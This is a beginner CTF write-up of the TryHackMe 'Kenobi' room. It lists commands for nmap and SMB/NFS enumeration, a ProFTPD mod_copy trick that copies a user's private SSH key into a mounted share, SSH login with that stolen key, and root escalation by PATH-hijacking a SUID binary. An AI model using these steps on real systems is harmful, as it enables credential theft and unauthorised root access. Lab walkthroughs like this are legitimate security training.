Kenobi on Tryhackme

This is the write up for the room Kenobi on Tryhackme and it is part of the complete beginners path

Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment.

Task Kenobi

Task 1

Read all that is in the task and startup the machine attached to this task

1.1 Make sure you’re connected to our network and deploy the machine

Press complete

1.2 Scan the machine with nmap, how many ports are open?

Open up a terminal and type in

nmap -T4 -p- <MACHINE_IP> 

You can also type in the following command but it will only scan the first 1000 ports, but it will scan services

nmap -sV -sC  <MACHINE_IP>

Answer: 7

Task 2:

Read all that is in the task

2.1 Using the nmap command above, how many shares have been found?

type in the command givin in the task

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <MACHINE_IP>

Answer: 3

2.2 Once you’re connected, list the files on the share. What is the file can you see?

Type in the following command

smbclient //<ip>/anonymous

Press enter when ask for a password

Now we are connected tot the share. For a list of files type in

ls

Answer log.txt

To read the file type in

more log.txt

2.3 What port is FTP running on?

We can see in the nmam scan what the ftp port is

Answer: 21

2.4 What mount can we see?

Type in the following command

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <MACHINE_IP>

Answer /var

Task 3

3.1 What is the version?

There are 2 ways to find this. For the first method type in the following command

nmap -sV -sC <MACHINE_IP>

For the second method.

nc < machine IP> 21

Answer 1.3.5

3.2 How many exploits are there for the ProFTPd running?

Type in the following command

searchsploit proftpd 1.3.5

Answer: 3

3.3 We know that the FTP service is running as the Kenobi user (from the file on the share) and an ssh key is generated for that user. 

Firts we use netcat to connect with the ftp

nc <machine_IP> 21

We cannot use any command but we know from the log file on hte SMB share the ftp service is started with kenobi

Type in the following command to copy the rsa keys

SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

Press complete

3.4 We knew that the /var directory was a mount we could see (task 2, question 4). So we’ve now moved Kenobi’s private key to the /var/tmp directory.

Press complete

3.5 What is Kenobi’s user flag (/home/kenobi/user.txt)?

Lets mount the /var/tmp directory to our machine. Type in the following commands

mkdir /mnt/kenobiNFS
mount machine_ip:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS

We now have a network mount on our deployed machine! We can go to /var/tmp and get the private key then login to Kenobi’s account.

Type in the following command

cp /mnt/kenobiNFS/tmp/id_rsa .

Now that we have copies the rsa files we can now login with those key

Tpye in the following

ssh -i id_rsa kenobi@<MACHINE_IP>

Oeps we forgot to set the correct rights. And because of that is is asking for a password

Back out and type in the following command

sudo chmod 600 id_rsa

And now we can login

Type in

ls -la

notice the user.txt. Type in

cat user.txt

Use this output for the naswer of the question

Task 4

4.1 What file looks particularly out of the ordinary? 

Read all that is in this task. It is hard to understand but we have written allot of write ups already about this SUID bit

Type in the following command

find / -perm -u=s -type f 2>/dev/null

Answer Correct Answer

4.2 Run the binary, how many options appear?

Answer 3

4.3 We are going to use this to get root access

Type in the following commands

cd /tmp
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
/usr/bin/menu

We copied the /bin/sh shell, called it curl, gave it the correct permissions and then put its location in our path. This meant that when the /usr/bin/menu binary was run, its using our path variable to find the “curl” binary.. Which is actually a version of /usr/sh, as well as this file being run as root it runs our shell as root!

now cat out root.txt

Use the output for the answer

BONUS

Now that we have a shell I notice the shell is not stable. Let’s make it stable with what we have learned so for. We have learned some technics in the room What the shell?

Type in the following command

python3 -c 'import pty;pty.spawn("/bin/bash")'